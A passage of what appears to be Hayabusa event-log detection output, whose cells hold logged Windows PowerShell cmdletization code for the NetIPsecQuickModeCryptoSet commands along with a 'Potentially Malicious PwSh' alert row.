(cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { 
[object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 